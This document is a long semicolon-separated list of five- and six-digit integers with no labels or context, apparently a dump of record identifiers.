71250;71476;71475;71383;71384;71851;71284;71444;71503;72110;71504;72096;71477;72111;71478;71479;71480;71445;71852;71481;71482;72097;71853;71446;71484;71483;71546;66339;71547;71548;71447;71619;71365;71385;71776;71777;66340;71332;71549;71620;71550;71588;71551;71386;71552;71589;71590;71754;71448;71785;71591;71449;71592;71621;71622;71623;71625;71624;71626;71593;71633;71634;71638;71594;64734;71755;71505;64735;71854;71595;71596;71770;71765;71756;71758;71757;71597;71766;71759;72867;71760;71598;71761;71767;71768;71599;71639;71903;71640;71627;71600;71601;64736;71602;71771;64737;71803;71788;71789;71790;64738;73870;73871;71804;71805;71868;71869;71870;64900;71871;71872;71873;64854;64855;64856;64974;64870;64871;64884;64872;64739;64679;64975;64940;64976;64740;64977;64857;65600;64978;65081;64858;64979;64741;64980;64981;64982;65587;65232;65588;65034;65035;65233;65036;64983;64997;64998;64941;64999;65000;65234;65001;65002;64984;65065;65037;65038;65040;65039;64901;65532;64985;65589;65657;64986;65645;65181;65182;65646;65619;65590;65620;65235;65621;65236;65591;65647;65658;65534;65533;65535;65536;65659;65066;65537;65538;65592;65713;65183;65593;65772;65559;65539;65636;65637;65648;65649;65671;65773;65594;65662;65650;65663;65774;65622;69189;65825;65824;65745;65746;65747;65748;66724;65749;65750;65751;65752;65753;65754;65755;65756;69229;65664;65758;65757;65775;65759;65776;65777;65813;65814;66005;65933;65858;65953;65826;65830;65831;65859;65832;65833;65954;65834;65760;65835;65836;66006;65837;65778;65860;65838;66591;65839;65861;66241;65956;65955;66242;65961;65815;65962;66160;66161;66162;65963;65964;65827;65965;65971;65966;65972;65828;66163;65973;65974;66007;66008;66164;67344;65934;66398;66399;66400;66376;66377;66378;66165;66218;66181;66009;66183;66182;66191;66166;69212;66207;66208;66219;66220;66258;66038;66039;66167;66010;66011;67345;66040;66184;66243;66209;66244;71553;66221;66168;66259;66260;66222;66261;66223;66245;66246;66282;66283;66262;66263;66224;66362;66363;66247;66248;66297;66249;66298;66320;66309;66299;66322;66321;66323;66324;66284;66364;66365;66366;66310;66592;66679;66432;66433;66703;66704;66379;66367;66385;66386;66639;66640;66368;66501;66401;66369;66434;66435;66453;66452;66387;66388;66502;66593;66503;66594;66380;66436;66595;66529;66530;66596;66531;66454;66532;66533;66597;66598;66599;66577;66578;66534;66579;66580;66725;66487;66641;66642;66680;66643;67346;66600;66681;66601;66604;66605;66606;66644;66607;66619;66645;66646;66647;66648;66649;66650;66682;66651;66653;66652;66654;66655;66656;66683;66684;66657;66685;66686;66688;66687;67347;67348;66727;66726;66728;67349;66729;66620;66621;66622;66623;66793;66624;66625;66626;66608;66627;66658;66609;66628;66610;66611;66612;66613;66743;66744;67350;66730;66745;66731;66746;66732;66747;67351;66748;66749;66733;66750;66751;67352;67353;66794;66629;67354;67355;66752;66753;66795;67356;67357;66796;66754;67358;67359;66797;67360;67361;67362;67363;67364;67365;67366;67367;67368;67369;67370;67371;67372;69218;67373;67374;67375;67376;67377;67378;67379;67380;67381;67382;67383;67384;67385;67386;67387;67388;67389;67390;67392;67391;67393;67394;67395;71912;71913;71914;72047;72048;71915;71916;71800;71917;71920;71921;71922;71923;72027;72028;71918;72189;71904;71919;71905;72012;72013;72120;72121;72307;72308;72441;72442;71957;71958;71959;72221;73535;73536;72014;72112;72113;72015;71981;72249;72250;72122;71982;72222;72123;72124;72125;72126;77586;77612;77782;72127;77783;77922;77784;77785;77786;77787;77608;77675;77866;79341;72049;77613;79342;79343;72029;77764;77788;77789;77790;77791;72030;77867;77765;77766;77868;77792;77793;77794;72031;78093;77869;77676;77677;77870;77795;78398;77796;77923;77924;78399;78400;77871;77925;77797;72137;72190;77926;77927;77872;77873;72269;77767;77974;77928;77929;77930;77798;77932;77931;72191;72050;77933;77975;77934;77935;77997;77936;77874;78241;78242;78048;78049;78243;78094;78050;77875;77937;77938;78051;78095;78052;77876;77939;78703;77940;77941;77942;77998;78053;78054;78368;77943;78369;78096;77944;77999;78370;78371;78000;78564;78001;77945;78055;78244;78245;78097;78098;78246;78247;78056;78099;78248;78249;78100;78372;78373;78101;78374;78565;78375;78102;78376;78566;72192;78377;78057;78378;78103;78379;78380;78058;78250;78251;78252;78401;78402;78704;78786;78381;78567;78787;78568;78382;78752;78705;78788;78492;78403;78629;78706;78789;78493;78630;78790;78791;78494;78569;79389;78631;78792;78632;78793;78682;78683;78794;79067;78795;78796;78797;78799;78798;78800;78801;78802;79068;78803;79191;79084;78571;78570;78581;78661;79085;78582;78572;78662;78707;78708;78709;78573;78862;78574;79390;78633;78710;78711;78575;78712;78576;72223;78610;78713;78804;72224;78726;78899;78805;78806;78807;78714;78808;79086;79069;78727;78715;78863;78728;78864;78809;78810;79070;79071;79087;79256;79088;78900;78901;78902;72225;78716;79192;78903;78729;78904;79257;78905;78906;78811;79193;78907;72226;79072;78812;79073;79089;79090;79194;79195;79391;79258;79091;78813;79092;79093;79196;78814;79094;79074;79095;79075;79096;79236;79097;80362;78865;79076;79237;78866;79238;79392;79098;79077;79099;79100;79078;79239;79314;79315;79316;79259;79317;79260;72309;79344;79261;79345;79262;72356;79240;79671;72357;79263;79747;79763;79264;79764;79393;79765;79318;79265;79394;79395;79748;79396;79766;79893;79565;79894;79767;79749;79895;79768;79698;79319;72310;79363;79397;79699;79645;79646;79769;79770;79771;81343;79672;81655;79398;79896;79897;79673;79647;79648;79898;81344;79773;79772;79607;79649;79650;79399;79400;81345;79674;79651;79675;79676;72251;79652;79677;79678;79679;79566;79653;79654;79608;79700;79774;80363;79899;79776;79777;72252;72270;79422;79778;79701;79900;79779;72154;79780;79702;79655;79703;79781;79782;79783;79704;79784;79750;79785;79786;79751;79752;79787;79788;79901;79902;79775;79903;79789;79904;79905;79705;79906;79907;79908;79910;79909;79911;79912;79913;79914;79915;80060;79790;79916;79917;80089;79918;72311;79919;79920;79921;80128;80129;80130;79923;79922;79791;79924;79925;80364;79926;79706;79792;79927;79928;79929;80131;79930;80132;79931;80365;79932;79933;79934;79935;80366;80090;80336;79936;79937;79938;79939;80061;79940;79941;79942;79943;79944;79945;79946;79947;80133;80062;80258;80367;80232;72443;80063;79948;80134;80368;72444;79949;81346;80135;80136;80402;79950;80137;80369;80138;80287;80370;80064;79951;80091;80139;79952;80233;79953;80140;80141;80337;80142;80143;80144;81347;80403;80288;79954;80234;83066;80338;80092;80835;80065;80836;80066;80404;80405;80235;80067;80068;80406;80339;80372;80371;80340;80236;80341;80373;80259;81581;80374;81837;80342;80260;80261;80375;80289;80290;80291;80343;80376;80344;80293;80292;80294;80463;80295;80296;80345;80297;80346;80145;80347;80146;80348;72715;80298;80349;80147;80237;80422;80310;80423;72716;72376;80377;80378;72403;80311;80312;80313;72377;80314;80315;81956;80316;81957;80317;80318;80319;80321;80322;80323;80320;80324;80325;80326;80327;80379;80380;80381;72445;72446;72462;72378;72447;72379;72463;72404;72405;72406;72407;72408;72516;72253;72517;72518;72448;72648;72593;72449;72358;72450;72464;72465;72451;72519;72360;72359;72466;72380;72520;72752;72623;72381;72624;72539;72545;72544;72540;73030;72783;72784;73422;72625;72785;72786;72521;72626;72628;72627;72629;72649;72631;72630;72522;72523;72524;72525;73310;73031;73032;72541;72650;72651;72526;72652;72654;72653;72759;72695;72674;72546;72547;72760;72632;72675;72761;72548;72762;72763;72656;72764;72765;72787;72766;72753;72788;72657;73537;72789;72767;72913;72806;72807;73140;72754;72914;72887;72888;72889;72915;72890;73107;72916;72917;72868;73033;72968;72969;72869;73034;72970;72971;72972;72973;72870;72891;73035;73108;73036;72871;73037;73038;72918;73109;73039;72892;73040;73041;73217;73042;73086;72974;73087;73110;73043;73044;73045;73141;73165;73142;73143;73166;73046;73144;73145;73146;73240;73257;73423;73167;73193;73168;73047;73169;73311;73048;73194;73312;73195;73170;73313;73258;73259;73260;73261;73352;73171;73314;73424;73353;73241;73354;73262;73218;73242;73746;73355;73356;73263;73357;73358;73359;73264;73360;73361;73362;73363;73425;73426;73364;73365;73366;73265;73315;73502;73503;73538;73504;73505;73506;73367;73925;73926;73539;73507;73540;73541;73542;73543;73544;73427;73428;73429;73600;73601;73430;73602;73545;73658;73508;73546;73772;73509;73547;73659;73660;73603;73627;73692;73548;73773;73774;73693;73694;73695;73696;73972;73697;73698;73699;73628;73729;73700;73701;73629;73630;73716;73702;74017;73717;73631;73775;73776;73703;73747;73730;73749;73748;73731;73750;73777;73778;73807;73808;73809;73810;73811;77061;73812;73813;73814;73704;73815;73816;73846;73845;73872;73873;73874;73875;73876;73817;74382;73927;73877;73928;73847;73929;73878;73879;73897;73930;73848;73818;73898;73819;79793;79346;73973;73952;73998;73953;73954;73955;74130;73880;73899;74109;74110;73999;73956;74000;74001;74002;74383;74018;74165;74166;74046;73957;74167;74003;74111;74281;74282;74112;74198;74199;74113;74047;74131;76092;74048;74168;74132;74049;74169;74170;74133;74050;74174;74178;74177;74179;74180;74200;74201;74228;74229;77092;74230;77093;74236;74384;74237;74231;74238;74175;74385;77103;77104;74232;74386;74257;74387;74388;74389;74390;74391;74392;74393;74394;74396;74395;74398;74397;74400;74399;74401;74402;74403;74316;74317;74404;74405;76093;76094;74406;74407;74408;74409;76095;76096;74410;74411;74412;74413;74414;74339;74500;74501;74503;74502;76151;74340;74341;76097;74478;76173;76098;76099;76100;76101;76152;76153;76263;76058;76264;74504;76083;76059;76420;76419;76209;76174;76175;76102;76210;76220;76221;76176;76133;76222;76265;76266;79794;76691;77768;77769;76374;76478;76334;76325;76326;77946;77947;76624;76421;76625;76223;76267;76350;76351;76352;76607;76268;76692;76370;76371;76363;76327;76539;76375;76391;76300;76392;76335;76393;76328;76376;76395;76394;76329;76859;76353;76860;76479;78383;76422;76377;76466;76483;76467;76540;76484;76396;77345;77346;76485;76541;76486;76542;77062;76468;76845;77063;76514;76608;76609;76693;76626;76627;76628;76629;77203;76610;77204;77205;76611;76846;76847;76848;76849;77064;76612;76850;77065;77206;76875;76851;76876;76877;76978;76878;76613;76979;76861;76862;77066;76918;76917;76920;76919;76718;76852;76980;76921;77770;76853;77094;76863;76981;77105;76982;77067;77068;77069;76983;77308;76984;77309;77310;77207;77070;77208;77209;77311;77440;77071;77223;77072;77210;77224;77268;77073;77095;77106;77225;77226;77312;77231;77347;77313;77314;77232;77948;77107;77392;77108;77211;77393;77394;77227;77348;77349;77350;77351;77228;77441;77442;77352;77353;77354;77269;77359;77233;77360;77361;77423;77424;77395;77396;77397;77425;77426;77398;77362;77399;77400;77443;77427;77771;77444;77678;77445;77446;77428;77772;77447;77449;77448;77587;77481;77482;77483;78038;77949;77588;77363;77589;77450;77590;77484;77591;77592;77429;77430;77614;78583;77800;77799;77593;77615;77594;77559;77595;77616;77451;77617;77801;89123;80448;80530;89124;80531;89125;89126;89127;89128;89129;80532;83920;80892;80575;80533;80576;89130;89131;80449;80450;80837;80893;80894;80451;80873;80464;80465;80974;80452;82306;80534;80874;89132;80535;80875;82626;82625;89133;80895;80536;80896;80876;80838;80975;81057;81058;81059;80839;80897;81610;89134;81611;81007;81060;81008;81091;89135;80976;81348;80977;80978;81092;89136;89137;89138;89140;89139;89141;89142;89143;89144;89146;89145;84374;84301;81529;84375;84453;84452;84454;84376;84455;84456;85282;84512;84513;84475;81530;85283;84457;84840;84458;84459;84514;84460;92046;84476;84515;81093;84678;84461;84477;84516;84517;84478;80979;84479;81190;85083;85084;81212;84679;85085;81151;84437;84480;81132;80980;84841;84901;84518;84519;84481;84680;84842;84520;84521;84682;84681;84773;84774;86312;84749;84750;84683;84684;84775;89147;81191;84776;84685;84843;84777;84686;84687;84688;84751;84752;84753;84778;84779;84844;89148;85086;84845;81133;85055;84902;84846;85056;84847;80981;84848;84903;84850;84849;81152;84904;81112;84967;85057;84689;84851;84968;85058;84690;84969;85087;85059;84691;84692;84852;84905;80982;84853;81153;85060;85061;81213;84854;89149;81349;85062;82596;84855;85132;85088;84906;85089;85063;85064;84907;85090;81170;85091;85092;85093;85065;84908;85094;84909;81061;85095;81171;81172;85133;85420;85421;85284;85285;85467;85286;85307;85468;85287;85166;85167;85389;85168;85288;85390;85289;81173;85290;92047;85169;85134;85170;85171;85548;85549;85358;85244;85308;85309;81094;85310;85311;85312;85313;81214;85314;85315;85359;81095;85316;85360;85391;85361;85362;85392;87959;85317;89150;85469;85363;85570;85364;85393;85470;85365;85471;85472;85473;85665;85550;85474;89151;85475;85476;85292;85291;85551;85552;85422;85318;85423;85394;85424;85553;85478;85477;85709;85591;85554;85479;85555;85592;85556;85425;85727;85480;85571;85811;85666;85481;85572;85482;85667;85668;85557;85659;85669;85558;85559;85670;86683;81215;85638;85671;89152;89153;85672;85812;85673;85813;85674;85814;85815;86684;85816;85698;85817;86313;85772;85818;85819;85675;85676;85677;81113;81216;87059;87060;87061;86331;86027;85678;85919;85773;85920;85820;85821;85728;85822;81114;81217;85824;85823;86028;85825;81115;81218;85826;85964;85900;85899;86029;85774;85827;86258;86128;85828;81350;85829;85990;85989;86158;85830;86159;86160;85831;86129;85934;85933;86031;86030;86032;85955;86161;85956;85892;86259;85832;86033;81351;86319;85921;85935;85936;86034;85937;86035;85938;85939;86036;85940;89154;86037;86038;86039;86797;86798;86799;86040;86041;85922;85923;86042;81174;86228;86229;86230;86231;86051;86232;86052;86643;86644;86273;86260;86233;86261;86077;86053;86274;86110;86130;86235;86234;86078;86054;86043;86275;86131;86055;86162;86163;86164;86165;86167;86166;86168;86169;86170;86171;86172;86236;86237;86173;86174;86685;86111;86376;81352;86262;86333;86332;86113;86112;86263;86264;86114;86175;83039;81192;89155;81219;81353;89156;81354;81355;81838;81356;81357;81358;81359;81220;81361;81360;81362;81363;81364;83194;83195;89157;89158;81221;81411;81410;81392;81393;81365;87113;81451;81452;81453;81454;89159;89160;89161;89162;89163;89164;89165;89166;89167;89168;89169;81366;89170;81394;89171;81367;82747;81414;81455;81456;89172;89173;82273;82274;81457;89174;81427;81582;81583;81428;81429;81531;81415;81458;81430;81431;81839;81584;81459;81612;81585;81586;89175;81796;81705;89176;89177;89178;89179;81613;81614;81532;81533;81656;81657;81840;81678;82723;82724;81679;82933;81841;81706;81658;89180;81707;81708;81709;81710;89181;89182;82540;81842;89183;81797;82541;81711;81615;81616;82542;81712;81680;81713;81843;89184;89185;81714;81681;81617;81682;89186;89187;81715;81716;81844;81845;89188;89189;89190;89191;89192;89193;89194;89195;81846;81717;81847;81848;82307;81849;81850;82275;89196;89197;89198;81851;89199;81852;81853;82276;82674;81854;81855;82277;82675;89200;89201;81856;81857;81858;81718;81859;81860;81958;92048;82543;81928;81861;89202;89203;81929;89204;81930;89205;81959;81862;82049;82544;81985;82050;81986;81863;81864;82748;89206;81865;89207;89208;89209;81931;82051;82433;81866;81960;89210;81961;89211;82052;82053;81987;82054;82278;89213;89212;89214;81988;82279;82280;89215;89216;89217;89218;89219;89220;81989;81990;82281;81991;82055;82056;81992;82725;82308;89221;82676;81993;82309;82310;81994;82677;82934;82545;82282;82434;82057;82283;82435;82436;82284;82285;82546;82547;82437;82059;82058;89222;82935;82438;89223;82060;82439;89224;82548;82440;82441;82442;82443;82061;89225;82311;89226;82866;82597;82598;82599;82749;89227;89228;82600;82549;82601;83821;82726;82602;82936;82840;82867;82937;82550;82603;82604;82727;82938;82868;82939;89229;82940;82605;82627;82606;82607;82608;82941;82551;85185;82552;82869;82553;82942;89231;89230;89232;82609;82750;82943;82728;82312;82610;82611;82944;82841;82945;82612;82444;82554;82946;82555;89233;82556;82613;89234;82947;82647;82648;82614;82649;82628;86408;82870;82445;82678;82629;89236;89235;89237;89238;82948;89239;82679;82630;89240;82871;82872;82950;89241;82729;83196;82951;85560;82949;82615;85561;82952;82953;82954;82955;82557;82616;82730;83309;89242;82956;82873;82874;82751;82875;82958;82957;82960;82959;82961;82962;82963;82752;82876;89243;82877;82878;82879;82880;82731;82964;86265;82881;82965;89244;82842;89245;82680;82966;82882;82883;83007;83008;82967;82968;83067;82884;82885;83009;83121;83089;82886;82887;83310;83090;83010;83149;89246;82969;82970;83311;83011;82971;84910;83012;83150;82972;83013;83151;82974;82973;82888;82975;89247;89248;89250;89249;89251;89252;89253;89254;83152;82889;82976;83014;89255;89256;83122;83123;83040;82977;82978;83041;83015;83042;83822;83017;83016;83043;83018;83197;83091;83068;83019;83070;83069;83020;83021;83071;83124;83022;83072;83125;83312;83092;83023;83198;83093;82979;83044;83199;83313;83200;83126;83202;83201;89257;83203;83073;83074;89258;83075;83204;83205;83076;83127;83314;83077;89259;83206;83207;89260;89261;83078;83128;83208;83209;83315;83750;92049;83210;83751;83211;83079;83316;83237;83094;83238;83212;83317;83213;83239;83318;83319;83153;83129;89262;83240;83214;83320;89263;83241;89264;83215;83321;83216;83382;83322;89265;89266;89267;89268;89270;89269;89272;89271;89274;89273;89275;89276;89277;89278;89279;83217;83154;89280;83218;83219;89281;83220;83221;83222;83323;83548;83324;83223;83549;83224;89282;83225;89283;89284;83242;83325;83790;87512;83326;83550;83383;83384;84302;84303;84304;83226;83385;83227;83228;83386;89285;83890;83327;83503;83478;83337;83504;83505;83551;83823;83891;83824;83825;83387;89286;89287;83338;83339;89288;89289;89290;83340;84305;83921;83552;83479;83341;83342;83480;83388;89291;89292;89293;89294;89296;89295;89297;89298;89299;89300;89302;89301;89304;89303;83553;83826;83481;84856;83892;83827;83828;84857;84095;83829;83830;83831;83791;83506;83893;83832;83507;83833;83508;83834;83509;83835;89305;83836;83922;83894;83923;83895;83896;83897;83924;83837;83838;84027;83898;84028;83899;89306;89307;83839;83925;83926;83927;89308;89309;84096;84029;83961;83928;84030;83929;84031;83930;83931;84032;84033;83932;83933;83996;83934;84034;83997;84064;84035;83998;83999;84036;83935;84172;84173;84000;84001;84002;83840;89310;83900;84065;84097;84098;89311;84037;84038;89312;89313;89314;89315;89316;89317;89318;89319;89320;89321;92050;89322;89323;84039;84040;84041;83962;86409;86410;89324;83936;84099;83937;84066;89325;84174;83963;83938;89326;84100;89327;84101;84102;84103;84042;84175;89328;84176;84177;84178;84858;84859;84306;84179;84180;84181;84307;89329;84131;84278;84067;84279;84280;84377;84281;84308;89330;84309;84310;89331;89332;84311;84312;89333;89334;84462;89335;84313;84378;84379;89336;89337;89338;89339;89340;89341;89342;89343;89344;89345;89346;89347;89348;89349;89350;89351;89352;89353;89354;89355;89356;89357;89358;89360;89359;89361;89362;89363;89364;89365;89366;89367;89368;89369;89371;89370;89372;89373;89374;89375;89376;89377;89378;89380;89379;89381;89382;89383;89384;89385;89387;89386;89388;89389;89390;89391;89392;89393;89395;89394;89396;89397;89398;89399;89400;89401;89402;89403;89404;89405;89406;89407;89408;89409;89410;89411;89412;89413;89414;89415;89416;89417;89418;89419;89420;89421;89422;89423;89424;89425;89426;89427;89428;89429;89430;89432;89431;89433;89434;89435;89436;89437;89438;89439;89440;89441;89442;89443;92051;89444;89445;89446;89447;89448;89449;89450;89451;89452;89453;89454;89456;89455;89457;89458;89459;89460;89461;89462;89463;89464;89465;89466;89467;89468;89469;89470;89471;89472;90639;92796;92645;94745;93258;92052;92225;94987;92766;96347;95299;96019;90128;89879;94767;94207;94769;94768;90208;92053;90946;96196;92054;89473;90640;95972;94988;93972;90898;89795;92668;90372;93441;96197;94208;92055;94989;95668;92848;90810;92056;93622;90947;94770;93724;95542;89880;92226;94057;93259;92797;94990;92227;94771;89474;90641;92228;95669;90209;93487;94772;95543;95611;90948;90325;89475;94773;92057;94656;90642;92058;93137;94774;93872;89881;94481;96348;96614;94775;90011;94776;93101;90373;89476;92229;94777;89477;92059;95726;92230;95578;90012;94746;90034;96198;89478;89796;94778;96289;89479;96349;90643;91057;92231;90949;93571;89480;93873;94924;92385;89481;94991;90412;95300;94523;90326;89482;95401;92589;95402;89483;90327;90726;89484;89485;92060;92061;92062;96350;90035;89486;92063;94413;90210;95945;94779;93973;89487;92064;89488;89489;94119;93623;92232;90950;95487;93874;95403;90457;94780;89490;91058;90951;93138;89882;93204;91059;92233;89491;89492;92234;94688;89493;92065;89494;90374;92066;89495;93572;96199;92067;92732;92068;95670;94590;92767;95363;95671;90458;93624;93102;93875;95404;90727;90328;90930;89496;95655;89699;92069;92684;89497;94992;89498;93488;89499;94235;92070;93876;92071;92072;90728;94781;90644;92798;93917;95488;90211;89500;94993;94657;92235;94782;92236;89501;93260;96107;94783;93625;89502;93355;94784;96200;92073;89503;92877;94785;96055;90413;96167;93877;94994;93878;92074;89504;92710;94786;92075;94024;93326;89505;89506;93573;95458;93489;89507;93327;90729;94995;95672;92329;92237;93085;95673;92799;94614;89508;93918;92076;90072;90129;92238;96156;91060;92077;90689;93031;92615;92590;94120;94787;89509;96157;93055;94788;92239;89510;92240;94789;90931;94996;89511;95037;89512;90459;89513;92078;90811;90329;96108;92241;95446;90952;90130;93974;92079;92080;94790;90645;90646;94791;92081;90036;89514;94997;93574;90013;92082;94792;94793;92242;93490;94998;89515;95579;90131;92646;94236;89516;94482;92083;96020;96273;96109;94483;96201;89517;89518;90730;92084;89519;94999;89520;94794;89521;94615;92085;90375;92086;89522;94795;92878;89523;92243;94658;92244;89524;93020;90256;89797;94747;90132;92245;92087;93086;95447;92441;89525;94796;94797;92529;92733;89526;90953;92669;92879;89527;92987;94798;92246;92088;89528;94025;92089;88464;92247;89798;95000;92090;89529;94799;92530;93139;92988;92531;90162;93261;92091;94800;94801;92386;95375;95901;90516;92330;90954;95301;89530;94484;94802;89531;93262;92849;89532;92092;90899;92093;89533;89534;89535;90212;92971;94058;95674;89536;89537;90955;93879;95302;89538;89539;94803;94804;92616;92094;92248;94805;95675;95303;94806;89946;93421;89540;89541;92095;92249;89542;89543;96202;89544;95001;93140;94121;92647;94807;93087;96203;92096;89545;95304;89546;92097;96204;89547;93626;92098;95002;96290;95580;95448;95003;90103;94524;92989;92250;93975;91061;95489;94808;89548;93627;94809;92617;93628;93880;90037;93881;94457;90731;89549;93751;89550;93670;89551;93882;89552;95405;93575;90956;93919;93103;95778;92880;89947;91062;92099;94925;96205;95779;92251;96351;95459;89799;94026;95727;92100;90647;90038;89553;89554;92101;89555;90104;93088;92252;90957;95676;93056;90690;90460;94810;90812;93021;95376;95780;92102;96168;92800;92103;92253;92532;94185;93725;95004;93726;96206;93671;95581;92442;90014;89556;94811;90732;90039;95490;90040;90648;89557;89800;89558;92533;89801;92104;94812;94813;93057;94814;93920;95728;90958;89559;93022;90517;92801;90213;90649;94059;91063;90214;95491;96319;89560;89561;90813;92105;92734;89562;90376;90461;95544;92106;89883;92443;95677;90959;92254;94689;92107;89563;90650;92802;90282;96465;92670;90900;96274;93058;92108;89564;92109;89565;92830;91064;93629;94815;94816;92803;89566;94485;90462;92110;95612;95678;93089;94817;94818;92387;94616;92255;92256;90651;94819;90691;89567;92388;92476;93672;89884;95415;90652;90814;92534;92804;92111;90215;92112;92257;95005;94820;90653;96207;94821;96733;92972;92113;93921;93141;92444;93205;92114;89802;90414;92258;92259;93551;94209;94414;92115;93976;95416;90960;93422;95006;92591;89568;94822;94823;92116;92117;93491;89569;93576;92118;92119;95781;92260;92768;96110;89570;92445;94148;90961;93423;90463;90105;90692;96021;89571;94824;93922;90694;90693;95613;92120;94825;90695;96022;92121;93883;95007;93059;92261;94826;94828;94827;90330;90331;90962;93424;93923;92881;92805;92990;89572;92535;89700;92262;92122;92123;96208;90963;90464;96169;90733;96023;93977;94591;94829;95782;89701;96209;94027;93328;95008;89573;92124;97157;93329;92263;90654;92264;93924;93901;89574;89575;94830;92125;95009;96210;89576;92265;96211;90769;95010;94831;92266;95729;90734;90041;89577;92126;94832;96320;95679;96111;90655;92671;90216;89578;95011;95305;94486;93330;90656;92648;94833;89579;90735;89580;90964;95012;92389;92960;92127;89581;92390;92735;92331;90217;92973;93630;94834;90465;92128;92267;94835;93206;94836;96158;90965;97533;94926;88111;94837;95013;89582;89803;94659;89583;90966;94487;95406;96212;95492;92268;92269;89584;90133;92129;90657;90770;94617;89585;93090;89586;93263;93978;90042;92685;90967;90968;93425;93142;95829;92270;96466;92271;94838;95493;92130;92272;92446;89587;94839;94840;96615;96159;90218;92131;94841;94842;95680;92132;95830;95681;92618;89588;90219;90658;92850;92273;90043;90283;90044;89702;92882;92536;90466;94843;92391;90659;92274;95306;95730;92672;92133;95682;94844;96352;96112;93925;92134;94028;92806;94845;94618;95731;92135;95902;93631;94210;96353;92275;90220;93632;90969;93752;95614;94122;89589;92276;93979;93727;92136;96213;89590;93032;92137;95460;92138;93926;92277;95903;95582;93728;92139;95494;92278;93633;90284;90875;94846;90660;95904;90815;89591;89592;93634;90221;92140;93884;94847;92279;96214;90816;93143;92280;90736;89593;90222;92332;92736;90377;93927;92141;93577;89594;94848;93980;89804;90518;92961;92619;93356;90970;92142;90842;90971;95732;90015;89595;92143;92281;90415;92282;89596;92144;93578;95583;93357;93885;89597;94849;94488;92283;92145;92146;89598;92284;95683;92285;92147;93579;96170;95783;93207;89599;95784;94186;89885;89600;95684;89601;89602;96354;94851;94850;94852;94853;92286;96215;90972;92649;92686;94854;90416;92148;92287;90257;90467;92149;90163;93673;94211;89603;89886;96056;94123;92883;96057;89887;90224;90223;92477;95685;93635;96216;93886;90225;94124;92150;89604;94855;96113;94856;95905;92711;89605;90519;89888;89606;94261;89607;96024;93426;93636;90973;95686;90468;93637;93208;89703;94187;92807;89608;90417;95615;93091;94748;91065;94660;94857;93928;92151;92152;92153;89609;93929;90661;92154;92155;89610;92156;92288;90737;95584;95946;94212;92157;92158;92592;94858;94859;92620;96670;92159;94661;96355;90134;92289;93981;96171;89611;94860;89612;90738;95495;90901;93887;94861;89613;90469;92808;94525;95947;92160;95687;93930;94526;89889;94862;92161;95973;89614;90696;89615;94237;96025;89616;95014;90974;93753;93888;94029;92162;92163;94863;90332;90817;92650;90975;89617;95449;93358;92164;90258;92165;92549;92166;89618;92167;92168;94489;92169;94030;92392;89619;94864;92290;96114;92171;92170;94490;94865;92333;95496;92291;92172;96275;90285;93331;95688;95038;92173;92174;96217;95461;95015;95497;92175;92809;90697;90226;92176;94080;94867;94866;92177;92292;90698;92178;92179;93264;94868;92293;92180;89620;92181;89621;93638;92393;94690;96218;90662;93359;95307;93754;94213;95462;90333;93265;94869;89890;94870;95689;90227;93427;92810;95690;96115;90228;94871;93729;93060;92182;89622;90739;92394;92593;95407;93639;92294;90378;92183;89891;89623;95906;94662;92184;92185;92186;93492;92737;89624;93982;89625;92187;89805;92811;92334;90976;89626;89627;92621;92188;89628;92189;94749;92295;95016;96026;92190;89629;92191;94872;92296;90470;89630;94873;89631;96027;95785;92297;90229;89892;94874;89893;90663;89632;92812;90230;93493;95017;96219;92298;92192;95691;95616;94592;89633;92962;92193;89634;92738;92299;92194;93889;94875;92622;90073;92335;89635;89636;92300;92769;89894;90471;90977;92623;90379;94876;96160;95308;89806;94877;92301;92195;92336;93890;89637;92302;90664;90231;92447;92196;95907;89704;92197;94031;94878;93332;92198;90843;92337;92303;89638;92199;92200;92201;92202;96161;92203;96220;89639;92204;92205;92206;94879;93266;89640;90045;94125;94880;95908;90978;92207;94881;94882;93209;92304;89641;89948;89642;94883;92208;90472;92209;90016;94884;94885;94886;93210;90473;94750;92210;89643;96356;89705;94887;92212;92211;92712;92305;94262;90520;92306;90046;94888;92213;93333;94593;89644;92673;95733;90047;89645;89646;92307;95948;90740;95692;96162;90779;89647;92214;89648;96291;95498;92215;90048;90232;95545;92216;93931;89649;92217;93580;89650;92991;92218;89706;93932;95417;92624;89807;101494;105196;97839;105803;97237;104343;104468;101495;105379;104755;99486;99141;100485;105804;96671;102182;101558;97672;96616;101559;99174;99404;105805;101560;105806;103609;102326;97645;101325;101561;99405;101095;101562;99922;103581;104147;101914;99255;99049;102098;99256;97158;101961;101563;101564;97500;96845;101068;97746;101036;102021;105807;102375;102932;101496;99487;104820;101565;97053;101860;96886;101566;101962;101567;104589;101986;100261;104821;96672;105808;105809;105810;101568;101569;100740;99605;99987;105705;96499;104443;100603;102376;105811;102377;101570;96964;97448;96673;105124;101571;102450;100183;105812;105813;105814;101572;101177;102022;97159;102793;96674;100434;105197;97784;101573;100729;101574;105380;99050;97160;100307;101575;97449;103097;99142;97334;102378;105815;103098;104404;105816;105817;101825;103883;99743;103433;101576;101497;96782;105818;102327;105819;96887;103884;97335;104725;96675;104344;104688;101577;105820;105198;103996;105821;103149;105822;105823;99676;99051;96846;97616;101326;105511;105824;96467;97238;103540;99293;104590;99923;102379;104591;97161;101578;101579;96705;97239;102506;102380;105825;105826;101580;97803;103885;97481;105827;96357;104726;101987;99642;105828;104710;105125;101581;105829;101795;96734;102716;101582;101988;105472;101014;101583;105830;105831;100854;100741;100486;101584;104756;102631;104822;101585;105126;105832;97240;101586;101587;103886;103099;97450;105833;102086;101588;100072;100968;105834;97241;102381;96571;101589;97759;100604;102892;101590;103887;104941;105835;102024;102023;103888;104823;105836;99677;97673;99052;100184;97451;104976;103889;105381;101591;102382;99423;97242;102933;100435;96706;105837;104148;100855;101592;101593;105838;103332;97030;105706;101498;101122;99606;100185;101594;101915;97452;104149;100856;97162;101595;102383;97243;97163;101596;100857;105199;99696;97674;101499;105839;104150;105840;100308;104592;101500;99988;101597;99406;105361;102934;105841;101989;105842;96500;97244;101598;97675;105843;105844;105845;104405;101599;97700;105846;102183;102893;101600;101601;96986;105847;102246;97164;101602;101603;101604;104646;101178;102384;97804;99607;104536;103520;101605;100969;104593;102099;105848;105849;105850;96965;102087;102601;97336;97968;105851;97054;101606;101990;105852;105853;102385;99608;105854;105855;101607;104594;101608;97031;104793;105856;100820;101609;104151;101610;101501;100186;97337;97676;104595;101991;101611;101212;102935;100187;97677;105857;104596;97701;97309;104444;105473;101612;101613;97032;105127;105858;101992;105859;101614;105128;103333;99407;103582;103100;101502;103890;100073;101861;97925;97702;103541;101615;104059;100821;104597;97840;96735;101916;96572;101862;